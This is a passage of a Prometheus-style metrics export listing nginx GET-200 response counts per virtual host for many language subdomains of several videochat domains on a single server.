nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="he.videochat.world"} 47134 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="hi.videochat.cafe"} 22886 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="hi.videochat.date"} 6651 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="hi.videochat.mx"} 11595 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="hi.videochat.show"} 10911 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="hi.videochat.tv.br"} 47679 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="hi.videochat.world"} 46693 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="hr.videochat.cafe"} 12618 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="hr.videochat.date"} 6758 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="hr.videochat.mx"} 21969 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="hr.videochat.show"} 16093 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="hr.videochat.tv.br"} 28192 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="hr.videochat.world"} 38694 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ht.videochat.cafe"} 19351 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ht.videochat.date"} 6890 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ht.videochat.mx"} 25461 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ht.videochat.show"} 13230 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ht.videochat.tv.br"} 33997 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ht.videochat.world"} 43567 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="hu.videochat.cafe"} 33526 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="hu.videochat.date"} 10328 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="hu.videochat.mx"} 25232 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="hu.videochat.show"} 23073 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="hu.videochat.tv.br"} 44284 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="hu.videochat.world"} 48534 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="id.videochat.cafe"} 33720 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="id.videochat.date"} 9311 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="id.videochat.mx"} 24750 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="id.videochat.show"} 21570 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="id.videochat.tv.br"} 43696 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="id.videochat.world"} 50377 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="is.videochat.cafe"} 41217 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="is.videochat.date"} 5481 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="is.videochat.mx"} 24194 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="is.videochat.show"} 31556 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="is.videochat.tv.br"} 57227 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="is.videochat.world"} 56425 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="it.videochat.cafe"} 20708 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="it.videochat.date"} 7240 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="it.videochat.mx"} 21588 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="it.videochat.show"} 15838 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="it.videochat.tv.br"} 34298 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="it.videochat.world"} 41675 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="jp.videochat.cafe"} 17296 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="jp.videochat.date"} 5482 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="jp.videochat.mx"} 8217 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="jp.videochat.show"} 20365 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="jp.videochat.tv.br"} 28770 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="jp.videochat.world"} 29968 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="jv.videochat.cafe"} 15823 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="jv.videochat.date"} 9025 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="jv.videochat.mx"} 29201 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="jv.videochat.show"} 19011 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="jv.videochat.tv.br"} 38827 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="jv.videochat.world"} 35535 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ka.videochat.cafe"} 12817 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ka.videochat.date"} 2870 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ka.videochat.mx"} 17810 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ka.videochat.show"} 8312 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ka.videochat.tv.br"} 32033 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ka.videochat.world"} 23792 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="kk.videochat.cafe"} 54495 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="kk.videochat.date"} 6519 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="kk.videochat.mx"} 16218 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="kk.videochat.show"} 16242 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="kk.videochat.tv.br"} 41467 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="kk.videochat.world"} 42022 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="km.videochat.cafe"} 16879 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="km.videochat.date"} 5118 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="km.videochat.mx"} 16533 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="km.videochat.show"} 10106 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="km.videochat.tv.br"} 27717 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="km.videochat.world"} 24004 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="kn.videochat.cafe"} 15655 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="kn.videochat.date"} 3890 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="kn.videochat.mx"} 23366 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="kn.videochat.show"} 13003 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="kn.videochat.tv.br"} 54258 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="kn.videochat.world"} 52682 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ko.videochat.cafe"} 20387 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ko.videochat.date"} 8173 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ko.videochat.mx"} 18936 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ko.videochat.show"} 20858 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ko.videochat.tv.br"} 26574 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ko.videochat.world"} 38992 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ky.videochat.cafe"} 37556 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ky.videochat.date"} 9417 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ky.videochat.mx"} 20165 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ky.videochat.show"} 13692 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ky.videochat.tv.br"} 55430 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ky.videochat.world"} 56790 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="lb.videochat.cafe"} 21808 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="lb.videochat.date"} 6826 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="lb.videochat.mx"} 24326 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="lb.videochat.show"} 17916 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="lb.videochat.tv.br"} 34536 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="lb.videochat.world"} 48211 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="lo.videochat.cafe"} 27352 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="lo.videochat.date"} 7138 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="lo.videochat.mx"} 15384 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="lo.videochat.show"} 15590 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="lo.videochat.tv.br"} 52173 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="lo.videochat.world"} 60235 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="lt.videochat.cafe"} 21719 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="lt.videochat.date"} 9221 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="lt.videochat.mx"} 29159 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="lt.videochat.show"} 26924 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="lt.videochat.tv.br"} 36818 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="lt.videochat.world"} 49344 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="lv.videochat.cafe"} 26345 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="lv.videochat.date"} 8885 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="lv.videochat.mx"} 19678 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="lv.videochat.show"} 16607 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="lv.videochat.tv.br"} 54980 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="lv.videochat.world"} 42224 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="mg.videochat.cafe"} 30285 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="mg.videochat.date"} 8333 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="mg.videochat.mx"} 19700 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="mg.videochat.show"} 20315 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="mg.videochat.tv.br"} 46109 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="mg.videochat.world"} 45439 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="mi.videochat.cafe"} 16732 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="mi.videochat.date"} 7371 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="mi.videochat.mx"} 13301 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="mi.videochat.show"} 15999 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="mi.videochat.tv.br"} 37909 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="mi.videochat.world"} 36146 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="mk.videochat.cafe"} 27542 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="mk.videochat.date"} 5985 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="mk.videochat.mx"} 21597 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="mk.videochat.show"} 13696 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="mk.videochat.tv.br"} 39159 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="mk.videochat.world"} 47867 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ml.videochat.cafe"} 14621 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ml.videochat.date"} 4639 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ml.videochat.mx"} 14339 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ml.videochat.show"} 12652 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ml.videochat.tv.br"} 28809 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ml.videochat.world"} 20830 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="mn.videochat.cafe"} 23548 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="mn.videochat.date"} 8822 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="mn.videochat.mx"} 16996 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="mn.videochat.show"} 12879 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="mn.videochat.tv.br"} 28795 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="mn.videochat.world"} 43305 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="mr.videochat.cafe"} 13371 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="mr.videochat.date"} 3998 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="mr.videochat.mx"} 26135 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="mr.videochat.show"} 15670 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="mr.videochat.tv.br"} 35129 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="mr.videochat.world"} 26985 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="mrj.videochat.cafe"} 34926 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="mrj.videochat.date"} 16354 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="mrj.videochat.mx"} 20126 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="mrj.videochat.show"} 21568 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="mrj.videochat.tv.br"} 46016 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="mrj.videochat.world"} 52996 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ms.videochat.cafe"} 36782 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ms.videochat.date"} 21458 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ms.videochat.mx"} 24292 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ms.videochat.show"} 28557 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ms.videochat.tv.br"} 50157 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ms.videochat.world"} 52668 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="mt.videochat.cafe"} 30900 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="mt.videochat.date"} 19040 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="mt.videochat.mx"} 25312 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="mt.videochat.show"} 14298 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="mt.videochat.tv.br"} 48668 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="mt.videochat.world"} 46005 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="my.videochat.cafe"} 12791 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="my.videochat.date"} 15036 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="my.videochat.mx"} 15789 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="my.videochat.show"} 17386 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="my.videochat.tv.br"} 34323 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="my.videochat.world"} 36918 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ne.videochat.cafe"} 12134 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ne.videochat.date"} 10858 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ne.videochat.mx"} 128708 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ne.videochat.show"} 11172 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ne.videochat.tv.br"} 28697 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ne.videochat.world"} 23161 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ngydkta.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="nl.videochat.cafe"} 24565 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="nl.videochat.date"} 20435 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="nl.videochat.mx"} 19182 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="nl.videochat.show"} 19445 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="nl.videochat.tv.br"} 35591 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="nl.videochat.world"} 44373 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="no.videochat.cafe"} 19368 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="no.videochat.date"} 23023 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="no.videochat.mx"} 19851 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="no.videochat.show"} 12457 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="no.videochat.tv.br"} 31918 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="no.videochat.world"} 40275 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="pa.videochat.cafe"} 19667 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="pa.videochat.date"} 16497 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="pa.videochat.mx"} 20797 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="pa.videochat.show"} 13387 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="pa.videochat.tv.br"} 50546 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="pa.videochat.world"} 52746 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="pap.videochat.cafe"} 14974 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="pap.videochat.date"} 14959 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="pap.videochat.mx"} 13914 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="pap.videochat.show"} 16625 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="pap.videochat.tv.br"} 30101 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="pap.videochat.world"} 32900 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="pl.videochat.cafe"} 21056 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="pl.videochat.date"} 18916 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="pl.videochat.mx"} 25129 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="pl.videochat.show"} 20565 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="pl.videochat.tv.br"} 36085 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="pl.videochat.world"} 53092 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="pt.videochat.cafe"} 33856 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="pt.videochat.date"} 39680 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="pt.videochat.mx"} 24193 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="pt.videochat.show"} 36049 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="pt.videochat.world"} 62860 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ro.videochat.cafe"} 21296 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ro.videochat.date"} 18543 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ro.videochat.mx"} 26742 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ro.videochat.show"} 12948 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ro.videochat.tv.br"} 31820 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ro.videochat.world"} 41722 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="rxwarht.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="sco.videochat.cafe"} 33134 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="sco.videochat.date"} 13787 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="sco.videochat.mx"} 22385 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="sco.videochat.show"} 17682 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="sco.videochat.tv.br"} 52120 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="sco.videochat.world"} 45460 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="si.videochat.cafe"} 22565 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="si.videochat.date"} 23349 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="si.videochat.mx"} 19933 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="si.videochat.show"} 17545 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="si.videochat.tv.br"} 51770 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="si.videochat.world"} 61686 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="sitemap.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="sitemaps.videochat.mx"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="sk.videochat.cafe"} 25692 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="sk.videochat.date"} 21963 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="sk.videochat.mx"} 25093 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="sk.videochat.show"} 13422 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="sk.videochat.tv.br"} 40138 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="sk.videochat.world"} 43450 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="sl.videochat.cafe"} 32439 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="sl.videochat.date"} 22559 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="sl.videochat.mx"} 30977 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="sl.videochat.show"} 14487 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="sl.videochat.tv.br"} 55579 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="sl.videochat.world"} 56420 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="sr.videochat.cafe"} 36157 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="sr.videochat.date"} 27288 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="sr.videochat.mx"} 22428 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="sr.videochat.show"} 17228 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="sr.videochat.tv.br"} 40974 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="sr.videochat.world"} 72687 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="staging.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="su.videochat.cafe"} 16991 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="su.videochat.date"} 19560 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="su.videochat.mx"} 23878 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="su.videochat.show"} 9130 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="su.videochat.tv.br"} 42479 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="su.videochat.world"} 34672 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="sv.videochat.cafe"} 24767 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="sv.videochat.date"} 18061 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="sv.videochat.mx"} 24261 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="sv.videochat.show"} 12006 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="sv.videochat.tv.br"} 34205 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="sv.videochat.world"} 44595 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="sw.videochat.cafe"} 24975 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="sw.videochat.date"} 22340 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="sw.videochat.mx"} 24058 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="sw.videochat.show"} 15731 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="sw.videochat.tv.br"} 34668 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="sw.videochat.world"} 37663 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ta.videochat.cafe"} 18499 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ta.videochat.date"} 16829 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ta.videochat.mx"} 18085 